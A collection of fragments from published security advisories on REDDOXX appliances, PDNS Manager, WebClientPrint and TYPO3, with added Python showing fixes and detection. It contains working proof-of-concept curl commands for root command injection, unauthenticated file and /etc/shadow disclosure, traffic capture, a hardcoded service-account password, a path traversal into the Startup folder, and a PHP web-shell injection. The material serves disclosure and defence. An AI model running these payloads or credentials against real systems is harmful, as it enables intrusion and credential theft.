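The traversal works because the file name from the CPJ is joined to %TEMP% and handed to the file system, which then resolves the "..\" components. The following Python example, added here and not code from WCPP or from the advisory, contrasts that unchecked join with a containment check a hardened handler would apply. The %TEMP% path with its placeholder user name and the list of allowed extensions are assumptions; the file name is the one from the proof of concept above. ntpath is used so the Windows path rules apply wherever the snippet runs:

```python
import ntpath

# Constructed %TEMP% location modelled on the advisory's example path; the user
# name is a placeholder and the checks below do not depend on it.
TEMP_DIR = r"C:\Users\user\AppData\Local\Temp"

# File name carried by the proof-of-concept CPJ file shown above.
POC_NAME = r"..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat"

# Extensions a print job may legitimately carry (an assumption for this example).
ALLOWED_EXT = {".pdf", ".txt", ".png", ".jpg"}


def naive_target(temp_dir, name):
    """What an unchecked join yields: the '..' components survive and the path
    resolves outside %TEMP% once the file system normalises it."""
    return ntpath.normpath(ntpath.join(temp_dir, name))


def safe_target(temp_dir, name):
    """Return the path a hardened handler may write to, or raise ValueError.

    Three independent checks, any one of which stops the PoC:
    1. the name must be a bare file name (no separators, drive or '..');
    2. the normalised result must still lie below temp_dir;
    3. the extension must be one a print job can legitimately have.
    ntpath treats both '\\' and '/' as separators, as Windows does.
    """
    if name in ("", ".", "..") or ntpath.basename(name) != name or ntpath.splitdrive(name)[0]:
        raise ValueError(f"rejected, not a plain file name: {name!r}")
    root = ntpath.normpath(temp_dir)
    resolved = ntpath.normpath(ntpath.join(root, name))
    if ntpath.commonpath([root, resolved]) != root:
        raise ValueError(f"rejected, escapes {root}: {resolved}")
    if ntpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"rejected, unexpected extension: {name!r}")
    return resolved


if __name__ == "__main__":
    print("unchecked:", naive_target(TEMP_DIR, POC_NAME))
    for candidate in ("job.pdf", POC_NAME, r"D:\job.pdf", "job.bat"):
        try:
            print("accepted :", safe_target(TEMP_DIR, candidate))
        except ValueError as exc:
            print("rejected :", exc)
```

The first check alone defeats this PoC; the second is kept because it also catches names that pass a superficial filter (for instance a separator the filter did not expect), and the third because a print helper has no business writing .bat files at all.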
Timeline
========

2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released

References
==========

[0] http://webclientprint.azurewebsites.net/
[1] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
[FD] [RT-SA-2016-007] Cross-Site Scripting in TYPO3 Formhandler Extension
twice for this attack to work and therefore can only target individual users. All in all this is considered to be a medium-risk vulnerability. Depending on the affected site the risk needs to be adjusted accordingly.

Timeline
========

2016-09-22 Vulnerability identified
2016-10-07 Customer approved disclosure to vendor
2016-10-07 Vendor notified
2016-10-11 Preliminary advisory sent to vendor
2016-10-12 Vendor prepared patch and sent it to TYPO3 security team
2016-10-13 Customer needs time to test the patch and deploy it
2017-07-10 Customer finished testing and deployment of patch
2017-07-17 Vendor agreed to have patch published as PR on Github
2017-07-27 Vendor patch published as pull request for a possibly active fork
2017-07-27 Advisory released
[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance
'REDTEAM_MARKER_END'"}}' \
  http://www.example.com/api/v1/rws/diagnose/start
---

Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are only used to distinguish the output of the "id" command in the final result, which can be retrieved and displayed using the following curl command-line:

---
$ curl --silent -H 'Accept: application/json' \
  http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | \
  sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | \
  sed 's/\\n/\n/g'
uid=0(root) gid=0(root) groups=0(root)
---

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

The diagnostic functions offered by the REDDOXX appliance allow attackers to execute arbitrary commands. Since the commands are executed with root privileges and no authentication is required, this is rated as a high risk.

Timeline
========

2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released
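The injection succeeds because the "count" parameter ends up on a shell command line, so "&&" chains a second command. The following Python example is added here and is not the appliance's code (which is not public): it models such a handler, shows the hardened form that validates both parameters against allow-lists and passes them as an argv list so no shell is involved, and reimplements the jq/sed extraction above on a constructed diagnose/result reply. The command-line shape "ping -c <count> <host>" and the sample reply are assumptions:

```python
import json
import re

# The count value from the advisory's proof of concept.
POC_COUNT = "1 && echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"

# Constructed diagnose/result reply: Output is a JSON string in which line
# breaks are "\n" escapes, which is why the sed pipeline above has to unescape
# them. Not a real appliance response.
SAMPLE_RESULT = json.dumps({"Output":
    "PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\n"
    "64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.03 ms\n"
    "REDTEAM_MARKER_START\nuid=0(root) gid=0(root) groups=0(root)\nREDTEAM_MARKER_END\n"})


def vulnerable_ping_cmdline(host, count):
    """Modelled on a handler that pastes request parameters into a shell
    command line (an assumption). The returned string is what `sh -c` would
    run; with POC_COUNT the host merely becomes an extra argument to the last
    echo, and `id` runs with the privileges of the web process."""
    return f"ping -c {count} {host}"


def hardened_ping_argv(host, count):
    """Validate both parameters and return an argv list for
    subprocess.run(argv) with shell=False: no shell ever sees the values, and
    the allow-lists reject '&&', ';', quotes, '$(' and spaces outright."""
    if not re.fullmatch(r"[1-9][0-9]?", str(count)):
        raise ValueError(f"count must be 1-99, got {count!r}")
    if not re.fullmatch(r"[A-Za-z0-9.\-]{1,253}", host):
        raise ValueError(f"host must be a hostname or IPv4 literal, got {host!r}")
    return ["ping", "-c", str(count), host]


def extract_marked_output(result_json):
    """Python counterpart of the jq | sed | sed pipeline: decode the JSON
    (which turns the \\n escapes into real newlines) and return the text
    between the two markers, or None if the injected command did not run."""
    output = json.loads(result_json)["Output"]
    m = re.search(r"REDTEAM_MARKER_START\n(.*?)\nREDTEAM_MARKER_END", output, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(vulnerable_ping_cmdline("127.0.0.1", POC_COUNT))
    print(hardened_ping_argv("127.0.0.1", 4))
    print(extract_marked_output(SAMPLE_RESULT))
```

Escaping the value for the shell would also stop this particular payload, but the argv form is the one that stays safe when the next parameter is added; the integer allow-list additionally keeps the count from being used for a ping flood.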
[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers unauthenticated access to the diagnostic functions of the administrative interface of the REDDOXX appliance. The functions allow, for example, to capture network traffic on the appliance's interfaces.

Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients' requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement."

(from the vendor's homepage)

More Details
============

The administrative interface of the REDDOXX appliance [0] offers several diagnostic tools in the "Diagnostic Center". Tcpdump is one of these tools. This tool can be used to capture network traffic on local interfaces. During a penetration test, it was discovered that this function, as well as the other diagnostic functions, does not require authentication.
Proof of Concept
================

The following curl command-line can be used to start the capture process:

---
$ curl --include --silent -H 'Content-Type: application/json' \
  --data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
  http://www.example.com/api/v1/rws/diagnose/start
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 14:58:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml
---

The following curl command-line stops the capture process:

---
$ curl --include --silent -H 'Content-Type: application/json' \
  --data-binary '{"Name":"Tcpdump"}' \
  http://www.example.com/api/v1/rws/diagnose/stop
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 15:00:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml
---

After the capture process is complete, the resulting capture file can be downloaded without authentication:

---
$ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
[...]
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
Saving to: 'tcpdump.cap'

tcpdump.cap         100%[===>]   1.72M  [...]

2017-05-18 17:01:36 (34.1 MB/s) - 'tcpdump.cap' saved [1801530/1801530]
---

None of these requests contain any credentials or cookies, which could provide authentication.

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

The diagnostic functions of the REDDOXX appliance can be used without authentication. This allows attackers to, for example, capture network traffic. During a penetration test it was possible to capture multiple emails and also POP3 login attempts with cleartext credentials. This is rated as a high risk.
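Until the appliance is patched, the only place this misuse shows up is the front-end web server's access log, since the endpoints accept the requests without any credential. The following Python example is added here and is not part of the advisory or the product: it scans constructed Apache combined-format log lines (modelled on the three requests above; the log format, the administrator network and the "web UI sends a Referer" heuristic are assumptions) and flags every use of the diagnose API and every capture download, marking those that do not come from the expected administrator hosts via the web UI:

```python
import re
from collections import namedtuple

# Constructed access-log lines mirroring the proof of concept; the appliance's
# Apache front end (see the Server header above) is assumed to log in the
# "combined" format. Not real appliance logs.
SAMPLE_LOG = """\
203.0.113.7 - - [18/May/2017:14:58:22 +0000] "POST /api/v1/rws/diagnose/start HTTP/1.1" 200 - "-" "curl/7.52.1"
203.0.113.7 - - [18/May/2017:15:00:17 +0000] "POST /api/v1/rws/diagnose/stop HTTP/1.1" 200 - "-" "curl/7.52.1"
203.0.113.7 - - [18/May/2017:15:01:36 +0000] "GET /rws/resources/diagnosemanager/tcpdump.cap HTTP/1.1" 200 1801530 "-" "Wget/1.19"
10.0.0.5 - - [18/May/2017:15:02:01 +0000] "POST /api/v1/proxy/auth/credentials HTTP/1.1" 200 233 "-" "Mozilla/5.0"
10.0.0.5 - - [18/May/2017:15:03:10 +0000] "POST /api/v1/rws/diagnose/start HTTP/1.1" 200 - "https://mail.example.com/admin/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Endpoints the advisory shows to be reachable without authentication.
DIAGNOSE_API = re.compile(r"^/api/v1/rws/diagnose/(start|stop|result)(/|$)")
CAPTURE_DOWNLOAD = re.compile(r"^/rws/resources/diagnosemanager/.*\.cap$")

Hit = namedtuple("Hit", "ip ts method path reason")


def scan(log_text, admin_nets=("10.0.0.",)):
    """Return a Hit for every diagnose-API call or capture download.

    Requests from the administrator network that carry a Referer (i.e. came
    through the web UI) are labelled 'admin ui'; everything else, including
    any scripted client from elsewhere, is labelled 'unexpected client'.
    Because the endpoints need no credentials, source and client are the only
    signals the log offers.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"]
        if DIAGNOSE_API.match(path):
            kind = "diagnose-api"
        elif CAPTURE_DOWNLOAD.match(path):
            kind = "capture-download"
        else:
            continue
        from_admin_ui = m["ip"].startswith(admin_nets) and m["referer"] not in ("", "-")
        reason = f"{kind} ({'admin ui' if from_admin_ui else 'unexpected client'})"
        hits.append(Hit(m["ip"], m["ts"], m["method"], path, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.ts}  {hit.ip:15} {hit.method:4} {hit.path}  {hit.reason}")
```

A capture download following a start/stop pair from the same non-administrative address, as in the first three sample lines, is the pattern the penetration test left behind; the Referer check is a weak signal on its own and should be read together with the source address.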
Timeline
========

2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released

References
==========

[0] https://www.reddoxx.com/en/
[FD] [RT-SA-2017-007] Undocumented Administrative Service Account in REDDOXX Appliance
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance

RedTeam Pentesting discovered an undocumented service account in the REDDOXX appliance software, which allows attackers to access the administrative interface of the appliance and change its configuration.

Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Hidden Service Account
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-007
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients' requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement."

(from the vendor's homepage)

More Details
============

Through the ISO provided on the vendor's homepage [1], it was possible to analyze the files in a typical REDDOXX appliance [0] installation. As part of this process, hardcoded credentials for a service account were found in a .NET binary file. With these credentials, it was possible to authenticate against the administrative interface.

Proof of Concept
================

The following curl command-line shows an unsuccessful login attempt with invalid credentials against the administrative interface:

---
$ curl --silent -H 'Content-Type: application/json' \
  --data '{"UserName": "redteam@local", "Password":"redteam"}' \
  http://www.example.com/api/v1/proxy/auth/credentials | jq .
{
  "ResponseStatus": {
    "ErrorCode": "Unauthorized",
    "Message": "Invalid UserName or Password",
    "Errors": []
  }
}
---

When the credentials extracted from the binaries are provided however, the webserver returns a session ID instead of an error message, indicating a successful login:

---
$ curl --silent -H 'Content-Type: application/json' \
  --data '{"UserName": "rdx-build-in-service-user@local", "Password":"rdx!1ntern4l"}' \
  http://www.example.com/api/v1/proxy/auth/credentials | jq .
{
  "SessionId": "Qm5odfSFB2tVh8De6HjD",
  "UserName": "rdx-build-in-service-user@local",
  "DisplayName": "",
  "ResponseStatus": {}
}
---

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

The hidden service account allows attackers to authenticate to the administrative interface of the appliance. With this level of access, the appliance can be completely reconfigured. For example, core functionalities, such as spam filtering or archiving, can be disabled. RedTeam Pentesting assumes that the hidden service account is present on all REDDOXX installations and rates its presence as a high risk.

Timeline
========

2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released

References
==========

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login)
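The credentials were found as string literals in a .NET binary. One detail matters when hunting for such accounts in an appliance image: .NET keeps string literals in the #US metadata heap as UTF-16LE, so an ASCII-only strings(1) pass over the assembly misses them. The following Python example is added here and is not the advisory's or the vendor's code: it extracts printable runs in both encodings from a byte blob and reports strings shaped like account names, plus whatever string follows a password-like keyword. The sample blob is constructed (PE/CLR noise, the service-account name from the advisory, a placeholder password) and the detection patterns are assumptions:

```python
import re

# .NET assemblies store user strings (the #US heap) as UTF-16LE; native code
# and metadata names are ASCII. Scan for both.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
ACCOUNT_RE = re.compile(r"[\w.\-]+@(?:local|[\w.\-]+\.\w+)", re.I)
SECRET_HINT = re.compile(r"pass(word|wd)?|pwd|secret|token", re.I)


def extract_strings(blob):
    """Yield (offset, encoding, text) for every printable run of 6+ chars."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_credential_candidates(blob):
    """Return (offset, encoding, text, why) for account-like strings and for
    any string that directly follows a password-like hint in the same
    encoding, which is how a literal 'Password' + value pair tends to sit in
    a compiled assembly."""
    runs = sorted(extract_strings(blob))
    found = []
    for i, (offset, enc, text) in enumerate(runs):
        if ACCOUNT_RE.fullmatch(text):
            found.append((offset, enc, text, "account-like"))
        if SECRET_HINT.search(text) and i + 1 < len(runs) and runs[i + 1][1] == enc:
            nxt = runs[i + 1]
            found.append((nxt[0], enc, nxt[2], "follows-secret-hint"))
    return found


def build_sample():
    """Constructed stand-in for a fragment of a .NET binary: ASCII PE/CLR
    noise, a UTF-16LE user string with the service-account name from the
    advisory, and a placeholder password (not the real one)."""
    def u16(s):
        return s.encode("utf-16le")
    return (b"MZ\x90\x00" + b"\x00" * 8
            + b"This program cannot be run in DOS mode." + b"\x00" * 6
            + b"#US\x00\x00" + u16("rdx-build-in-service-user@local") + b"\x00\x00"
            + u16("Password") + b"\x00\x00" + u16("example-placeholder")
            + b"\x00" * 4 + b"mscorlib\x00")


if __name__ == "__main__":
    for offset, enc, text, why in find_credential_candidates(build_sample()):
        print(f"0x{offset:06x} {enc:9} {why:20} {text}")
```

On a real image the same scan is run over every managed DLL and EXE extracted from the ISO; the "follows-secret-hint" heuristic produces noise, so its hits are leads to confirm against the login endpoint, not findings by themselves.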
[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance
XX}",'\
  '"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
  'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"
"xml"
"initramfs-tools"
"sysctl.d"
"pear"
"sudoers.d"
"cron.monthly"
"rc5.d"
"init"
"byobu"
"pki"
"xpdf"
"cron.weekly"
"snmp"
"ld.so.conf.d"
[...]
---

Since the process handling the requests runs with root privileges, it was also possible to read the contents of the file "/etc/shadow", which is only readable by root:

---
$ curl --silent --data-binary '{"id":"{----}",'\
  '"method":"FileTransfer.DownloadFile","params":{"FileName": "/etc/shadow",'\
  '"Sequence": 1,"ChunkSize": 1}}' 'http://www.example.com/RdxEngine/json' \
  | jq -r .result.ChunkData | tr -d '\r\n' | base64 -d
root:$6$$YYY[...]:14993:0:9:7:::
daemon:*:16652:0:9:7:::
bin:*:16652:0:9:7:::
sys:*:16652:0:9:7:::
sync:*:16652:0:9:7:::
games:*:16652:0:9:7:::
man:*:16652:0:9:7:::
lp:*:16652:0:9:7:::
mail:*:16652:0:9:7:::
news:*:16652:0:9:7:::
uucp:*:16652:0:9:7:::
proxy:*:16652:0:9:7:::
www-data:*:16652:0:9:7:::
backup:*:16652:0:9:7:::
list:*:16652:0:9:7:::
irc:*:16652:0:9:7:::
gnats:*:16652:0:9:7:::
nobody:*:16652:0:9:7:::
libuuid:!:16652:0:9:7:::
syslog:*:16652:0:9:7:::
messagebus:*:16899:0:9:7:::
sshd:*:16899:0:9:7:::
vboxadd:!:16899::
statd:*:16899:0:9:7:::
admin:$1$$ZZ:14054:0:9:7:::
clamav:!:16899:0:9:7:::
ntp:*:16899:0:9:7:::
hacluster:!:16899:0:9:7:::
firebird:*:16899:0:9:7:::
redis:!:16899:0:9:7:::
snmp:*:16899:0:9:7:::
bind:*:16899:0:9:7:::
smbadmin:!:17037:0:9:7:::
smbuser:!:17037:0:9:7:::
---

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

Attackers with access to a REDDOXX appliance are able to retrieve directory listings and content of arbitrary files.
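The DownloadFile method hands the file back as base64 chunks identified by a Sequence number, which the one-liner above decodes for a single chunk. The following Python example is added here and is not the advisory's or the vendor's code: it reassembles a multi-chunk download in the right order (the reply layout is modelled on the JSON shown above) and then does what the Security Risk section describes an attacker doing with the result, namely picking out the shadow entries that actually carry a hash worth cracking. The shadow contents and the chunk size are constructed; the hashes are placeholders:

```python
import base64
import json

# Hash algorithm identifiers used in shadow(5) entries.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

# Constructed shadow contents shaped like the output above; the hashes are
# placeholders, not the appliance's real ones.
SHADOW_TEXT = (
    "root:$6$saltsalt$PLACEHOLDERHASH:14993:0:99999:7:::\n"
    "daemon:*:16652:0:99999:7:::\n"
    "libuuid:!:16652:0:99999:7:::\n"
    "admin:$1$saltsalt$PLACEHOLDERHASH:14054:0:99999:7:::\n"
    "clamav:!:16899:0:99999:7:::\n"
)


def chunk_replies(data, chunk_size=40):
    """Constructed stand-in for the API's DownloadFile replies: one base64
    chunk per reply, each carrying its Sequence number and the CR/LF the
    appliance embeds, returned shuffled so that ordering matters."""
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    replies = [
        json.dumps({"id": "{----}", "result": {
            "Sequence": n + 1,
            "ChunkData": base64.b64encode(chunk).decode() + "\r\n"}})
        for n, chunk in enumerate(chunks)
    ]
    return replies[::-1]


def reassemble(replies):
    """Order chunks by Sequence, strip the CR/LF inside ChunkData, decode the
    base64 and join: the multi-chunk form of
    `jq -r .result.ChunkData | tr -d '\\r\\n' | base64 -d`."""
    results = sorted((json.loads(r)["result"] for r in replies),
                     key=lambda r: r["Sequence"])
    return b"".join(
        base64.b64decode(r["ChunkData"].replace("\r", "").replace("\n", ""))
        for r in results
    )


def crackable_accounts(shadow_text):
    """Return (user, algorithm) for entries carrying a real hash. An empty
    field or one starting with '*' or '!' marks a locked or password-less
    account and gives an offline attacker nothing to work on."""
    found = []
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, pwd = line.split(":")[:2]
        if not pwd or pwd[0] in "*!":
            continue
        if pwd.startswith("$"):
            algo = CRYPT_IDS.get(pwd.split("$")[1], "unknown")
        else:
            algo = "descrypt"
        found.append((user, algo))
    return found


if __name__ == "__main__":
    shadow = reassemble(chunk_replies(SHADOW_TEXT.encode())).decode()
    for user, algo in crackable_accounts(shadow):
        print(f"{user}: {algo}")
```

The "admin" entry in the output above is an md5crypt ($1$) hash, which is cheap to attack offline; that, rather than the directory listing, is what turns the file disclosure into a credential compromise.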
Although this vulnerability requires attackers to submit a valid session ID, the vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3] show how this requirement can be fulfilled even by attackers without valid credentials. Additionally, the RdxEngine process handling the requests to the vulnerable methods runs with root privileges, allowing attackers to read any file on the filesystem and, for example, extract the local user hashes for offline brute-force attacks. This vulnerability is therefore rated as a high risk.

Timeline
========

2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released

References
==========

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005
[FD] [RT-SA-2017-005] Unauthenticated Extraction of Session-IDs in REDDOXX Appliance
          "SessionType": "Console",
          "IPAddress": "127.0.0.1",
          "Details": "rdx-build-in-service-user@local"
        },
        {
          "Id": "{----}",
          "SessionType": "WebService",
          "IPAddress": "",
          "Details": "rdx-build-in-service-user@local Last access: 22-5-17 10:26:17"
        },
        {
          "Id": "{----}",
          "SessionType": "WebService",
          "IPAddress": "",
          "Details": "Info@[...] Last access: 22-5-17 09:53:21"
        },
        {
          "Id": "{----}",
          "SessionType": "WebService",
          "IPAddress": "",
          "Details": "Administrator@[...] Last access: 22-5-17 10:09:30"
        },
        {
          "Id": "{----}",
          "SessionType": "WebService",
          "IPAddress": "",
          "Details": "rdx-build-in-service-user@local Last access: 22-5-17 10:11:19"
        },
        {
          "Id": "{----}",
          "SessionType": "WebService",
          "IPAddress": "",
          "Details": "rdx-build-in-service-user@local Last access: 22-5-17 13:13:19"
        }
      ]
    }

The tool jq [2] is used to format the JSON output returned by the appliance's API.

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

The risk of this vulnerability is estimated to be high. The extracted session IDs can be used by attackers to impersonate the user associated with the ID when interacting with the appliance. An authenticated session is also a precondition to exploit the vulnerability described in rt-sa-2017-006 [3], which allows arbitrary file disclosure as root.

Timeline
========

2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released

References
==========

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login)
[2] https://stedolan.github.io/jq/
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-006
[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance
    /sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
    vboxadd:x:999:1::/var/run/vboxadd:/bin/false
    statd:x:104:65534::/var/lib/nfs:/bin/false
    admin:x:0:0:admin,,,:/home/admin:/opt/reddoxx/local/scripts/admin.sh
    clamav:x:105:111::/var/lib/clamav:/bin/false
    ntp:x:106:112::/home/ntp:/bin/false
    hacluster:x:107:113:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
    firebird:x:108:114:Firebird Database Administator,,,:/var/lib/firebird:/bin/bash
    redis:x:109:115:redis server,,,:/var/lib/redis:/bin/false
    snmp:x:110:116::/var/lib/snmp:/bin/false
    bind:x:111:117::/var/cache/bind:/bin/false
    smbadmin:x:1001:1001::/home/smbadmin:/bin/false
    smbuser:x:1002:1002::/home/smbuser:/bin/false

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

This vulnerability can be used by attackers to download arbitrary files, provided the filename and path are known, from any filesystem reachable on the appliance. Depending on the configuration of the appliance, attackers can read the credentials stored in the configuration files or extract session IDs from log files. There are also no authentication checks in place. Therefore, the vulnerability poses a high risk.

Timeline
========

2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released
[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance
a system under the attacker's control. The vulnerability is therefore rated as a high risk.

Timeline
========

2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released
[FD] [RT-SA-2017-011] Remote Command Execution in PDNS Manager
      .chr(100)])",
      "userName":"administrator",
      "userPassword":"password",
      "type":"mysql"
    }

Because the addslashes() function prevents the use of single or double quotes in the GET variable name, the name was instead encoded with the chr() function; the expression decodes to the string "cmd".

Since Git commit 3bf4e28 [1] from 12 December 2016, PDNS Manager uses the PHP PDO class for establishing a database connection. As the PDO class is quite liberal in what it accepts in its Data Source Name parameter, the configuration parameters shown above are accepted and allow for a valid database connection, because the additional data in the "port" parameter is ignored by the PDO class. Finally, the file config/config-user.php will be written with the following content:

    http://example.com/config/config-user.php?cmd=uname%20-a

Proof of Concept
================

1. Check if install.php is still available and can be used to write a new configuration by visiting the following URL:

       http://example.com/install.php

2. Set up a database that PDNS Manager can connect to.

3. Send an HTTP POST request with a manipulated "port" parameter, e.g.

       curl -H 'Content-Type: application/json' --data \
         '{"host":"attacker-system.example.com",
           "user":"root",
           "password":"secret",
           "database":"pdnsdb",
           "port":"3306;system($_GET[chr(99).chr(109).chr(100)])",
           "userName":"administrator",
           "userPassword":"password",
           "type":"mysql"}' \
         http://example.com/api/install.php

4. Run arbitrary commands:

       http://example.com/config/config-user.php?cmd=uname%20-a

Workaround
==========

Ensure that config/config-user.php exists.

Fix
===

